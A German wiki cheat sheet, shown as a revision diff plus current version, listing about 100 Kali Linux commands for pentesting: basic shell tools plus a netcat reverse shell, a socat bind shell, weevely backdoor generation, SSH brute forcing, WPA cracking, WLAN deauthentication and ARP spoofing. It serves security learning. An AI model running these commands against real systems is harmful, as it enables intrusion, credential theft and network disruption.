100 Kali Kommandos: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
 
Zeile 1: Zeile 1:
= 01. Basic Linux Commands =
+
= Basic Linux Commands =
  
 
;Zeigt das aktuelle Arbeitsverzeichnis.
 
;Zeigt das aktuelle Arbeitsverzeichnis.
 
*pwd
 
*pwd
  
Listet Dateien und Verzeichnisse auf.
+
;Listet Dateien und Verzeichnisse auf.
 
*ls
 
*ls
  
Wechselt das Verzeichnis.
+
;Wechselt das Verzeichnis.
 
*cd
 
*cd
  
Erstellt ein neues Verzeichnis.
+
;Erstellt ein neues Verzeichnis.
 
*mkdir <dir>
 
*mkdir <dir>
  
Löscht eine Datei.
+
;Löscht eine Datei.
 
*rm <file>
 
*rm <file>
  
Löscht ein Verzeichnis rekursiv.
+
;Löscht ein Verzeichnis rekursiv.
 
*rm -r <dir>
 
*rm -r <dir>
  
Kopiert Dateien.
+
;Kopiert Dateien.
 
*cp <src> <dest>
 
*cp <src> <dest>
  
Verschiebt oder benennt Dateien um.
+
;Verschiebt oder benennt Dateien um.
 
*mv <src> <dest>
 
*mv <src> <dest>
  
Erstellt eine leere Datei.
+
;Erstellt eine leere Datei.
 
*touch <file>
 
*touch <file>
  
Gibt den Inhalt einer Datei aus.
+
;Gibt den Inhalt einer Datei aus.
 
*cat <file>
 
*cat <file>
  
Öffnet eine Datei im Editor Nano.
+
;Öffnet eine Datei im Editor Nano.
 
*nano <file>
 
*nano <file>
  
Öffnet eine Datei im Editor Vim.
+
;Öffnet eine Datei im Editor Vim.
 
*vim <file>
 
*vim <file>
  
Sucht eine Datei anhand des Namens.
+
;Sucht eine Datei anhand des Namens.
 
*find / -name <filename>
 
*find / -name <filename>
  
Durchsucht eine Datei nach Textmustern.
+
;Durchsucht eine Datei nach Textmustern.
 
*grep "text" <file>
 
*grep "text" <file>
  
Zeigt die eingaben Befehle der Shell-Historie.
+
;Zeigt die eingegebenen Befehle der Shell-Historie.
 
*history
 
*history
  
= 02. System Information Commands =
 
  
Zeigt Systeminformationen.
+
= System Information Commands =
 +
 
 +
;Zeigt Systeminformationen.
 
*uname -a
 
*uname -a
  
Zeigt den aktuellen Benutzer.
+
;Zeigt den aktuellen Benutzer.
 
*whoami
 
*whoami
  
Zeigt UID und GID des Benutzers.
+
;Zeigt UID und GID des Benutzers.
 
*id
 
*id
  
Zeigt die Systemlaufzeit.
+
;Zeigt die Systemlaufzeit.
 
*uptime
 
*uptime
  
Zeigt den belegten Festplattenplatz.
+
;Zeigt den belegten Festplattenplatz.
 
*df -h
 
*df -h
  
Zeigt die Größe eines Verzeichnisses.
+
;Zeigt die Größe eines Verzeichnisses.
 
*du -sh <dir>
 
*du -sh <dir>
  
Zeigt aktive Prozesse.
+
;Zeigt aktive Prozesse.
 
*top
 
*top
  
Listet alle Prozesse auf.
+
;Listet alle Prozesse auf.
 
*ps aux
 
*ps aux
  
Beendet einen Prozess über die PID.
+
;Beendet einen Prozess über die PID.
 
*kill <PID>
 
*kill <PID>
  
Interaktiver Prozessmanager.
+
;Interaktiver Prozessmanager.
 
*htop
 
*htop
  
= 03. User Management Commands =
 
  
Erstellt einen neuen Benutzer.
+
= User Management Commands =
 +
 
 +
;Erstellt einen neuen Benutzer.
 
*adduser <username>
 
*adduser <username>
  
Löscht einen Benutzer.
+
;Löscht einen Benutzer.
 
*deluser <username>
 
*deluser <username>
  
Ändert das Passwort eines Benutzers.
+
;Ändert das Passwort eines Benutzers.
 
*passwd <username>
 
*passwd <username>
  
Fügt einen Benutzer zur sudo-Gruppe hinzu.
+
;Fügt einen Benutzer zur sudo-Gruppe hinzu.
 
*usermod -aG sudo <username>
 
*usermod -aG sudo <username>
  
Zeigt Gruppenmitgliedschaften eines Benutzers.
+
;Zeigt Gruppenmitgliedschaften eines Benutzers.
 
*groups <username>
 
*groups <username>
  
Ändert Dateiberechtigungen.
+
;Ändert Dateiberechtigungen.
 
*chmod 777 <file>
 
*chmod 777 <file>
  
Ändert Dateibesitzer und Gruppe.
+
;Ändert Dateibesitzer und Gruppe.
 
*chown user:group <file>
 
*chown user:group <file>
  
= 04. Networking Commands =
 
  
Zeigt Netzwerkinterfaces an.
+
= Networking Commands =
 +
 
 +
;Zeigt Netzwerkinterfaces an.
 
*ifconfig
 
*ifconfig
  
Zeigt IP-Adressen und Interfaces.
+
;Zeigt IP-Adressen und Interfaces.
 
*ip a
 
*ip a
  
Zeigt Wireless-Interfaces an.
+
;Zeigt Wireless-Interfaces an.
 
*iwconfig
 
*iwconfig
  
Testet Netzwerkverbindung via ICMP.
+
;Testet Netzwerkverbindung via ICMP.
 
*ping <IP>
 
*ping <IP>
  
Zeigt offene Ports mit zugehörigen Prozessen.
+
;Zeigt offene Ports mit Prozessen.
 
*netstat -tulnp
 
*netstat -tulnp
  
Scant ein Zielsystem auf offene Ports.
+
;Scant ein Zielsystem auf offene Ports.
 
*nmap <IP>
 
*nmap <IP>
  
Zeigt den Routingpfad zu einem Host.
+
;Zeigt den Routingpfad zu einem Host.
 
*traceroute <IP>
 
*traceroute <IP>
  
Lädt Daten von einer URL herunter.
+
;Lädt Daten von einer URL herunter.
 
*curl <URL>
 
*curl <URL>
  
Lädt eine Datei von einer URL.
+
;Lädt eine Datei von einer URL herunter.
 
*wget <URL>
 
*wget <URL>
  
Zeigt DNS-Informationen zu einer Domain.
+
;Zeigt DNS-Informationen zu einer Domain.
 
*dig <domain>
 
*dig <domain>
  
Führt einfache DNS-Abfragen durch.
+
;Führt einfache DNS-Abfragen durch.
 
*nslookup <domain>
 
*nslookup <domain>
  
= 05. Hacking & Penetration Testing Commands =
 
  
Startet die Metasploit-Konsole.
+
= Hacking & Penetration Testing =
 +
 
 +
;Startet die Metasploit-Konsole.
 
*msfconsole
 
*msfconsole
  
Erstellt Payloads.
+
;Erstellt Payloads.
 
*msfvenom
 
*msfvenom
  
Durchsucht Exploit-Datenbanken.
+
;Durchsucht Exploit-Datenbanken.
 
*searchsploit <exploit>
 
*searchsploit <exploit>
  
Testet SQL-Injection gegen eine URL.
+
;Testet SQL-Injection gegen eine URL.
 
*sqlmap -u <URL> --dbs
 
*sqlmap -u <URL> --dbs
  
Führt SSH-Bruteforce durch.
+
;Bruteforced SSH-Zugänge.
 
*hydra -l user -P pass.txt <IP> ssh
 
*hydra -l user -P pass.txt <IP> ssh
  
Crackt Hashes mit John the Ripper.
+
;Crackt Hashes mit John the Ripper.
 
*john --wordlist=rockyou.txt hash.txt
 
*john --wordlist=rockyou.txt hash.txt
  
Aktiviert den Monitor-Modus für WLAN.
+
;Aktiviert Monitor-Modus für WLAN.
 
*airmon-ng start wlan0
 
*airmon-ng start wlan0
  
Fängt WLAN-Pakete ab.
+
;Fängt WLAN-Pakete ab.
 
*airodump-ng wlan0mon
 
*airodump-ng wlan0mon
  
Deauthentifiziert Clients aus einem WLAN.
+
;Deauthentifiziert Clients.
 
*aireplay-ng -0 10 -a <BSSID> wlan0mon
 
*aireplay-ng -0 10 -a <BSSID> wlan0mon
  
Crackt WPA/WPA2-Passwörter.
+
;Crackt WPA/WPA2-Passwörter.
*aircrack-ng -w rockyou.txt -b <BSSID> <capture_file>
+
*aircrack-ng -w rockyou.txt -b <BSSID> <capture>
  
Crackt Hashes mit GPU.
+
;Crackt Hashes mit GPU.
 
*hashcat -m 2500 hash.txt rockyou.txt
 
*hashcat -m 2500 hash.txt rockyou.txt
  
Führt ARP-Spoofing durch.
+
;Führt ARP-Spoofing durch.
 
*ettercap -T -q -i eth0
 
*ettercap -T -q -i eth0
  
Extrahiert Bilder aus Netzwerktraffic.
+
;Extrahiert Bilder aus Netzwerktraffic.
 
*driftnet -i eth0
 
*driftnet -i eth0
  
Zeichnet Netzwerkpakete auf.
+
;Zeichnet Netzwerkpakete auf.
 
*tcpdump -i eth0
 
*tcpdump -i eth0
  
Analysiert Netzwerkverkehr.
+
;Analysiert Netzwerkverkehr.
 
*tshark -i eth0
 
*tshark -i eth0
  
Scant Webserver auf Schwachstellen.
+
;Scant Webserver auf Schwachstellen.
 
*nikto -h <URL>
 
*nikto -h <URL>
  
Führt Directory-Bruteforce durch.
+
;Führt Directory-Bruteforce durch.
 
*gobuster dir -u <URL> -w /usr/share/wordlists/dirb/common.txt
 
*gobuster dir -u <URL> -w /usr/share/wordlists/dirb/common.txt
  
Scant WordPress-Installationen auf Schwachstellen.
+
;Scant WordPress auf Schwachstellen.
 
*wpscan --url <URL>
 
*wpscan --url <URL>
  
= 06. Privilege Escalation & Post-Exploitation =
 
  
Zeigt sudo-Berechtigungen.
+
= Privilege Escalation & Post-Exploitation =
 +
 
 +
;Zeigt sudo-Berechtigungen.
 
*sudo -l
 
*sudo -l
  
Wechselt zum root-Benutzer.
+
;Wechselt zum root-Benutzer.
 
*sudo su
 
*sudo su
  
Erstellt eine interaktive Shell in Python.
+
;Erstellt eine interaktive Shell in Python.
 
*python -c 'import pty; pty.spawn("/bin/bash")'
 
*python -c 'import pty; pty.spawn("/bin/bash")'
  
Startet einen Netcat-Listener.
+
;Startet einen Netcat-Listener.
 
*nc -lvnp <port>
 
*nc -lvnp <port>
  
Erstellt eine Reverse-Shell.
+
;Erzeugt eine Reverse-Shell.
 
*nc <IP> <port> -e /bin/bash
 
*nc <IP> <port> -e /bin/bash
  
Zeigt den aktuellen Benutzer im Meterpreter.
+
;Zeigt den aktuellen Benutzer in Meterpreter.
 
*meterpreter> getuid
 
*meterpreter> getuid
  
Versucht Privilege Escalation im Meterpreter.
+
;Versucht Privilege Escalation in Meterpreter.
 
*meterpreter> getsystem
 
*meterpreter> getsystem
  
Überträgt Dateien via Meterpreter.
+
;Überträgt Dateien via Meterpreter.
 
*meterpreter> upload / download <file>
 
*meterpreter> upload / download <file>
  
Öffnet eine System-Shell im Meterpreter.
+
;Öffnet eine System-Shell im Meterpreter.
 
*meterpreter> shell
 
*meterpreter> shell
  
Schlägt mögliche Privileged Escalation Exploits vor.
+
;Schlägt mögliche PrivEsc-Exploits vor.
 
*linux-exploit-suggester
 
*linux-exploit-suggester
  
= 07. File & Data Encryption =
 
  
Verschlüsselt eine Datei mit GPG.
+
= File & Data Encryption =
 +
 
 +
;Verschlüsselt eine Datei.
 
*gpg -c <file>
 
*gpg -c <file>
  
Entschlüsselt eine GPG-Datei.
+
;Entschlüsselt eine GPG-Datei.
 
*gpg -d <file.gpg>
 
*gpg -d <file.gpg>
  
Verschlüsselt Dateien mit OpenSSL.
+
;Verschlüsselt Dateien mit OpenSSL.
 
*openssl enc -aes-256-cbc -salt -in <file> -out <file.enc>
 
*openssl enc -aes-256-cbc -salt -in <file> -out <file.enc>
  
Entschlüsselt mit OpenSSL AES.
+
;Entschlüsselt OpenSSL AES-Dateien.
 
*openssl enc -d -aes-256-cbc -in <file.enc> -out <file>
 
*openssl enc -d -aes-256-cbc -in <file.enc> -out <file>
  
= 08. Forensics & Steganography =
 
  
Extrahiert druckbare Strings aus Dateien.
+
= Forensics & Steganography =
 +
 
 +
;Extrahiert druckbare Zeichenketten.
 
*strings <file>
 
*strings <file>
  
Analysiert Binärdateien.
+
;Analysiert Binärdateien auf Strukturen.
 
*binwalk <file>
 
*binwalk <file>
  
Extrahiert Dateien aus Images.
+
;Extrahiert Dateien aus Images.
 
*foremost -i <image>
 
*foremost -i <image>
  
Zeigt Metadaten einer Datei.
+
;Zeigt Metadaten einer Datei.
 
*exiftool <file>
 
*exiftool <file>
  
Findet versteckte Daten in Bildern.
+
;Findet versteckte Daten in Bildern.
 
*stegseek <stegfile>
 
*stegseek <stegfile>
  
= 09. Password & Hash Cracking =
 
  
Erkennt Hash-Typen.
+
= Password & Hash Cracking =
 +
 
 +
;Erkennt Hash-Typen.
 
*hashid <hash>
 
*hashid <hash>
  
Bruteforced SSH-Zugänge.
+
;Führt SSH-Bruteforce durch.
 
*hydra -L users.txt -P passwords.txt ssh://<IP>
 
*hydra -L users.txt -P passwords.txt ssh://<IP>
  
Crackt Passwort-Hashes.
+
;Crackt Passwort-Hashes.
 
*john hash.txt --wordlist=rockyou.txt
 
*john hash.txt --wordlist=rockyou.txt
  
= 10. Web Application Testing =
 
  
Führt Directory Enumeration durch.
+
= Web Application Testing =
 +
 
 +
;Führt Directory Enumeration durch.
 
*dirb <URL>
 
*dirb <URL>
  
Führt Web-Fuzzing durch.
+
;Führt Web-Fuzzing durch.
 
*wfuzz -c -z file,wordlist.txt --hc 404 <URL>/FUZZ
 
*wfuzz -c -z file,wordlist.txt --hc 404 <URL>/FUZZ
  
Testet Webanwendungen auf XSS.
+
;Testet Webanwendungen auf XSS.
 
*xsssniper -u <URL>
 
*xsssniper -u <URL>
  
Testet Webanwendungen auf Command Injection.
+
;Testet Webanwendungen auf Command Injection.
 
*commix --url <URL>
 
*commix --url <URL>
  
Startet Burp Suite.
+
;Startet Burp Suite.
 
*burpsuite
 
*burpsuite
 +
  
 
= Miscellaneous =
 
= Miscellaneous =
  
Erstellt Wordlists aus Zeichenfolgen.
+
;Erstellt Wordlists.
 
*crunch 8 8 abcdefghijklmnopqrstuvwxyz
 
*crunch 8 8 abcdefghijklmnopqrstuvwxyz
  
Führt nmap über Proxychains aus.
+
;Führt nmap über Proxychains aus.
 
*proxychains nmap -sT -Pn <IP>
 
*proxychains nmap -sT -Pn <IP>
  
Startet Tor.
+
;Startet den Tor-Dienst.
 
*tor
 
*tor
  
Startet einen MITM-Proxy.
+
;Startet einen MITM-Proxy.
 
*mitmproxy
 
*mitmproxy
  
Startet das Social Engineering Toolkit.
+
;Startet das Social Engineering Toolkit.
 
*setoolkit
 
*setoolkit
  
Erstellt eine Wordlist aus einer Webseite.
+
;Erstellt Wordlists aus Webseiten.
 
*cewl -w words.txt -d 5 <URL>
 
*cewl -w words.txt -d 5 <URL>
  
Erstellt einen Web-Backdoor mit weevely.
+
;Erstellt einen Web-Backdoor mit weevely.
 
*weevely generate password backdoor.php
 
*weevely generate password backdoor.php
  
Startet einen bind shell via socat.
+
;Startet eine bind shell via socat.
 
*socat TCP-LISTEN:4444,fork EXEC:/bin/bash
 
*socat TCP-LISTEN:4444,fork EXEC:/bin/bash
  
Zeigt Domaininformationen an.
+
;Zeigt Domaininformationen.
 
*whois <domain>
 
*whois <domain>
  
Sammelt Mails und Subdomains zu einer Domain.
+
;Sammelt Mails und Subdomains.
 
*theHarvester -d <domain> -l 100 -b google
 
*theHarvester -d <domain> -l 100 -b google
  
Crackt ZIP-Passwörter.
+
;Crackt ZIP-Passwörter.
 
*fcrackzip -u -D -p rockyou.txt <file.zip>
 
*fcrackzip -u -D -p rockyou.txt <file.zip>
  
Sucht Subdomains.
+
;Sucht Subdomains einer Domain.
 
*dnsmap -d <domain>
 
*dnsmap -d <domain>

Aktuelle Version vom 16. November 2025, 08:56 Uhr

Basic Linux Commands

Zeigt das aktuelle Arbeitsverzeichnis.
  • pwd
Listet Dateien und Verzeichnisse auf.
  • ls
Wechselt das Verzeichnis.
  • cd
Erstellt ein neues Verzeichnis.
  • mkdir <dir>
Löscht eine Datei.
  • rm <file>
Löscht ein Verzeichnis rekursiv.
  • rm -r <dir>
Kopiert Dateien.
  • cp <src> <dest>
Verschiebt oder benennt Dateien um.
  • mv <src> <dest>
Erstellt eine leere Datei.
  • touch <file>
Gibt den Inhalt einer Datei aus.
  • cat <file>
Öffnet eine Datei im Editor Nano.
  • nano <file>
Öffnet eine Datei im Editor Vim.
  • vim <file>
Sucht eine Datei anhand des Namens.
  • find / -name <filename>
Durchsucht eine Datei nach Textmustern.
  • grep "text" <file>
Zeigt die eingegebenen Befehle der Shell-Historie.
  • history


System Information Commands

Zeigt Systeminformationen.
  • uname -a
Zeigt den aktuellen Benutzer.
  • whoami
Zeigt UID und GID des Benutzers.
  • id
Zeigt die Systemlaufzeit.
  • uptime
Zeigt den belegten Festplattenplatz.
  • df -h
Zeigt die Größe eines Verzeichnisses.
  • du -sh <dir>
Zeigt aktive Prozesse.
  • top
Listet alle Prozesse auf.
  • ps aux
Beendet einen Prozess über die PID.
  • kill <PID>
Interaktiver Prozessmanager.
  • htop


User Management Commands

Erstellt einen neuen Benutzer.
  • adduser <username>
Löscht einen Benutzer.
  • deluser <username>
Ändert das Passwort eines Benutzers.
  • passwd <username>
Fügt einen Benutzer zur sudo-Gruppe hinzu.
  • usermod -aG sudo <username>
Zeigt Gruppenmitgliedschaften eines Benutzers.
  • groups <username>
Ändert Dateiberechtigungen.
  • chmod 777 <file>
Ändert Dateibesitzer und Gruppe.
  • chown user:group <file>


Networking Commands

Zeigt Netzwerkinterfaces an.
  • ifconfig
Zeigt IP-Adressen und Interfaces.
  • ip a
Zeigt Wireless-Interfaces an.
  • iwconfig
Testet Netzwerkverbindung via ICMP.
  • ping <IP>
Zeigt offene Ports mit Prozessen.
  • netstat -tulnp
Scant ein Zielsystem auf offene Ports.
  • nmap <IP>
Zeigt den Routingpfad zu einem Host.
  • traceroute <IP>
Lädt Daten von einer URL herunter.
  • curl <URL>
Lädt eine Datei von einer URL herunter.
  • wget <URL>
Zeigt DNS-Informationen zu einer Domain.
  • dig <domain>
Führt einfache DNS-Abfragen durch.
  • nslookup <domain>


Hacking & Penetration Testing

Startet die Metasploit-Konsole.
  • msfconsole
Erstellt Payloads.
  • msfvenom
Durchsucht Exploit-Datenbanken.
  • searchsploit <exploit>
Testet SQL-Injection gegen eine URL.
  • sqlmap -u <URL> --dbs
Bruteforced SSH-Zugänge.
  • hydra -l user -P pass.txt <IP> ssh
Crackt Hashes mit John the Ripper.
  • john --wordlist=rockyou.txt hash.txt
Aktiviert Monitor-Modus für WLAN.
  • airmon-ng start wlan0
Fängt WLAN-Pakete ab.
  • airodump-ng wlan0mon
Deauthentifiziert Clients.
  • aireplay-ng -0 10 -a <BSSID> wlan0mon
Crackt WPA/WPA2-Passwörter.
  • aircrack-ng -w rockyou.txt -b <BSSID> <capture>
Crackt Hashes mit GPU.
  • hashcat -m 2500 hash.txt rockyou.txt
Führt ARP-Spoofing durch.
  • ettercap -T -q -i eth0
Extrahiert Bilder aus Netzwerktraffic.
  • driftnet -i eth0
Zeichnet Netzwerkpakete auf.
  • tcpdump -i eth0
Analysiert Netzwerkverkehr.
  • tshark -i eth0
Scant Webserver auf Schwachstellen.
  • nikto -h <URL>
Führt Directory-Bruteforce durch.
  • gobuster dir -u <URL> -w /usr/share/wordlists/dirb/common.txt
Scant WordPress auf Schwachstellen.
  • wpscan --url <URL>


Privilege Escalation & Post-Exploitation

Zeigt sudo-Berechtigungen.
  • sudo -l
Wechselt zum root-Benutzer.
  • sudo su
Erstellt eine interaktive Shell in Python.
  • python -c 'import pty; pty.spawn("/bin/bash")'
Startet einen Netcat-Listener.
  • nc -lvnp <port>
Erzeugt eine Reverse-Shell.
  • nc <IP> <port> -e /bin/bash
Zeigt den aktuellen Benutzer in Meterpreter.
  • meterpreter> getuid
Versucht Privilege Escalation in Meterpreter.
  • meterpreter> getsystem
Überträgt Dateien via Meterpreter.
  • meterpreter> upload / download <file>
Öffnet eine System-Shell im Meterpreter.
  • meterpreter> shell
Schlägt mögliche PrivEsc-Exploits vor.
  • linux-exploit-suggester


File & Data Encryption

Verschlüsselt eine Datei.
  • gpg -c <file>
Entschlüsselt eine GPG-Datei.
  • gpg -d <file.gpg>
Verschlüsselt Dateien mit OpenSSL.
  • openssl enc -aes-256-cbc -salt -in <file> -out <file.enc>
Entschlüsselt OpenSSL AES-Dateien.
  • openssl enc -d -aes-256-cbc -in <file.enc> -out <file>


Forensics & Steganography

Extrahiert druckbare Zeichenketten.
  • strings <file>
Analysiert Binärdateien auf Strukturen.
  • binwalk <file>
Extrahiert Dateien aus Images.
  • foremost -i <image>
Zeigt Metadaten einer Datei.
  • exiftool <file>
Findet versteckte Daten in Bildern.
  • stegseek <stegfile>


Password & Hash Cracking

Erkennt Hash-Typen.
  • hashid <hash>
Führt SSH-Bruteforce durch.
  • hydra -L users.txt -P passwords.txt ssh://<IP>
Crackt Passwort-Hashes.
  • john hash.txt --wordlist=rockyou.txt


Web Application Testing

Führt Directory Enumeration durch.
  • dirb <URL>
Führt Web-Fuzzing durch.
  • wfuzz -c -z file,wordlist.txt --hc 404 <URL>/FUZZ
Testet Webanwendungen auf XSS.
  • xsssniper -u <URL>
Testet Webanwendungen auf Command Injection.
  • commix --url <URL>
Startet Burp Suite.
  • burpsuite


Miscellaneous

Erstellt Wordlists.
  • crunch 8 8 abcdefghijklmnopqrstuvwxyz
Führt nmap über Proxychains aus.
  • proxychains nmap -sT -Pn <IP>
Startet den Tor-Dienst.
  • tor
Startet einen MITM-Proxy.
  • mitmproxy
Startet das Social Engineering Toolkit.
  • setoolkit
Erstellt Wordlists aus Webseiten.
  • cewl -w words.txt -d 5 <URL>
Erstellt einen Web-Backdoor mit weevely.
  • weevely generate password backdoor.php
Startet eine bind shell via socat.
  • socat TCP-LISTEN:4444,fork EXEC:/bin/bash
Zeigt Domaininformationen.
  • whois <domain>
Sammelt Mails und Subdomains.
  • theHarvester -d <domain> -l 100 -b google
Crackt ZIP-Passwörter.
  • fcrackzip -u -D -p rockyou.txt <file.zip>
Sucht Subdomains einer Domain.
  • dnsmap -d <domain>